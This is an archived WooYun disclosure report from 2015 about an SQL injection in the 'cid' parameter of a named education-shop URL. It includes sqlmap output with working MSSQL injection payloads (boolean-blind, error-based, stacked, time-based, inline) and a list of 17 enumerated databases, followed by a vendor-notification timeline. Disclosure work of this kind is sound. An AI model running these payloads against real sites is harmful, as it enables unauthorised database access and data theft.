乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-03-24: 细节已通知厂商并且等待厂商处理中 2015-03-25: 厂商已经确认,细节仅向厂商公开 2015-04-04: 细节向核心白帽子及相关领域专家公开 2015-04-14: 细节向普通白帽子公开 2015-04-24: 细节向实习白帽子公开 2015-05-09: 细节向公众公开
么么哒
方正测评:http://shop.edu-founder.com/PageProductsList.aspx?cid=1&DpName=1 注入参数cid=1
上sqlmap:---Place: GETParameter: cid Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: cid=1 AND 4319=4319&DpName=1 Type: error-based Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause Payload: cid=1 AND 7718=CONVERT(INT,(SELECT CHAR(113)+CHAR(122)+CHAR(101)+CHAR(106)+CHAR(113)+(SELECT (CASE WHEN (7718=7718) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(105)+CHAR(102)+CHAR(100)+CHAR(113)))&DpName=1 Type: stacked queries Title: Microsoft SQL Server/Sybase stacked queries Payload: cid=1; WAITFOR DELAY '0:0:5'--&DpName=1 Type: AND/OR time-based blind Title: Microsoft SQL Server/Sybase time-based blind Payload: cid=1 WAITFOR DELAY '0:0:5'--&DpName=1 Type: inline query Title: Microsoft SQL Server/Sybase inline queries Payload: cid=(SELECT CHAR(113)+CHAR(122)+CHAR(101)+CHAR(106)+CHAR(113)+(SELECT (CASE WHEN (5305=5305) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(105)+CHAR(102)+CHAR(100)+CHAR(113))&DpName=1---web application technology: ASP.NET, Microsoft IIS 7.5, ASP.NET 2.0.50727back-end DBMS: Microsoft SQL Server 2008
出现数据库:available databases [17]:[*] AbroadGeneral[*] Arp_Data[*] edu_founder[*] EduFounder[*] EduFzShop[*] FounderPie[*] fz[*] LFounder[*] master[*] model[*] msdb[*] NetZMAP[*] tempdb[*] ZmapAbroad[*] ZmapCenter[*] ZmapGaoZhi[*] ZMAPNET
已证明!
你们来吧
危害等级:中
漏洞Rank:8
确认时间:2015-03-25 11:54
CNVD确认所述漏洞情况,暂未建立与网站管理单位的直接处置渠道,待认领。
暂无